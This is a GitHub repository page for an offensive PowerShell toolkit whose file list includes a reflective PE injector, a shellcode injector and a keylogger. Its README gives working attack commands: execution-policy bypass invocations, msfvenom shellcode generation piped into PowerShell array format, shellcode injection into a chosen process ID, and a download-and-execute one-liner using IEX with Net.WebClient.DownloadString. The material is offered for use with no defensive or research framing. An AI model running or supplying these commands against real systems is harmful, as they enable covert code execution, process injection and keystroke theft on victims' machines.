Skip to content

smb01/PowershellTools

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection.ps1
 
 
README.md
README.md
 
 
dll2ps.ps1
dll2ps.ps1
 
 
exe2ps.ps1
exe2ps.ps1
 
 
inject.ps1
inject.ps1
 
 
keylog.ps1
keylog.ps1
 
 

Repository files navigation

PowershellTools

dll2ps.ps1 (Support DllRegisterServer)

powershell.exe -ep bypass -f dll2ps.ps1 -File test.dll -Out out.ps1

exe2ps.ps1

powershell.exe -ep bypass -f exe2ps.ps1 -File test.exe -Param "hello world" -Out out.ps1

inject.ps1 (Support win7 cross session injection)

Generate shellcode
x86:msfvenom -a x86 --platform windows -p windows/exec CMD="cmd /c c:\windows\notepad.exe" exitfunc=thread -f powershell | cut -c 9- | tr  -s '\r\n' ',' | cut -c 9- | sed 's/^/@(/g' | sed -e 's/\(.*\),/\1)/'
x64:msfvenom -a x86_64 --platform windows -p windows/x64/exec CMD="cmd /c c:\windows\notepad.exe" exitfunc=thread -f powershell | cut -c 9- | tr  -s '\r\n' ',' | cut -c 9- | sed 's/^/@(/g' | sed -e 's/\(.*\),/\1)/'
Usage
powershell.exe -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/Invoke-Shellcode.ps1'); Invoke-Shellcode -Shellcode @(...) -ProcessID pid -Verbose"
powershell.exe -ep bypass -c "&{. C:\Invoke-Shellcode.ps1; Invoke-Shellcode -Shellcode @(...) -ProcessID pid -Verbose}"

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

17 stars

Watchers

1 watching

Forks

12 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages